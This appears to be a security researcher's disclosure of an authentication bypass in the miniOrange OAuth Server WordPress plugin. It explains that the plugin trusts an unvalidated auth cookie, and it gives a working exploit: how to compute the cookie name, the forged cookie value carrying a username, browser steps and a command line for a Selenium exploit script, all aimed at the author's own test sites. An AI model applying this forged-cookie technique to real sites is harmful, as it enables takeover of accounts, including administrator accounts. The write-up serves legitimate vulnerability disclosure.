The plugin was affected by an Auth Bypass vulnerability. To bypass authentication, we only need to know the user’s username. Depending on whose username we know, which can be easily queried because it is usually public data, we may even be given an administrator role on the client’s website.

 

Let’s check the plugin

The _mo_get_logged_user_from_auth_cookie() function gets the logged in user with the following code:

$auth_cookie = wp_parse_auth_cookie( '', 'logged_in' );

if ( ! $auth_cookie || is_wp_error( $auth_cookie ) || ! $auth_cookie['token'] || ! $auth_cookie['username'] ) {
	return false;
}}

We can see from the code that it uses the wp_parse_auth_cookie() function. Which is a completely faulty use in this case, as it does not use authentication. Description of the function:

Authentication cookie components. None of the components should be assumed to be valid as they come directly from a client-provided cookie value.

It is clearly described that the returned value is not validated. But the plugin doesn’t use any validation.

 

Let’s see how we can exploit this vulnerability

All we have to do is set a logged in cookie that contains the username. The other values can be anything, as there is no validation in the plugin.

The default logged in cookie name is:

define( 'LOGGED_IN_COOKIE', 'wordpress_logged_in_' . COOKIEHASH );

where the hash is:

define( 'COOKIEHASH', md5( $siteurl ) );

 

So in the https://lana.solutions/vdb/miniorange-oauth-server which is a test WordPress website:

57a442d3cd2a47583304a69461f75869, which is the result of the following function:

echo md5('https://lana.solutions/vdb/miniorange-oauth-server');

 

If we set the following cookie, we can authenticate ourselves as a test user on the OAuth server:

wordpress_logged_in_57a442d3cd2a47583304a69461f75869=test%7Canything%7Canything%7Canything;

Then all we have to do is set the cookie using the browser’s Developer Tools on the server’s website
So we can even do this through a browser by opening the server’s website, which in our case is https://lana.solutions/vdb/miniorange-oauth-server/.
Then open the client’s website, which in our case is https://lana.solutions/vdb/miniorange-oauth-client/wp-admin and log in using the Single Sign On button.

 

The professional exploit script

I created a Python script with Selenium that exploits the vulnerability and automatically opens the webpage in Google Chrome:

Source: miniorange_oauth_server_plugin_vdb_exploit_with_selenium.py

How to use:

python3 miniorange_oauth_server_plugin_vdb_exploit_with_selenium.py --client_url="https://lana.solutions/vdb/miniorange-oauth-client/" --server_url="https://lana.solutions/vdb/miniorange-oauth-server/" --username="test"

Run the above command in the Linux (desktop version) terminal.

How the exploit works step by step:

  • Opens OAuth server website
  • Sets the logged in cookie with the “test” username
  • Opens OAuth client website
  • Click Single Sign On button (so it starts OAuth authentication)

 

Try it

Feel free to try and use the lana.solutions/vdb WordPress websites for testing. I have set the roles and capabilities, so you can only get low level access to the website.

Client: https://lana.solutions/vdb/miniorange-oauth-client/

Server: https://lana.solutions/vdb/miniorange-oauth-server/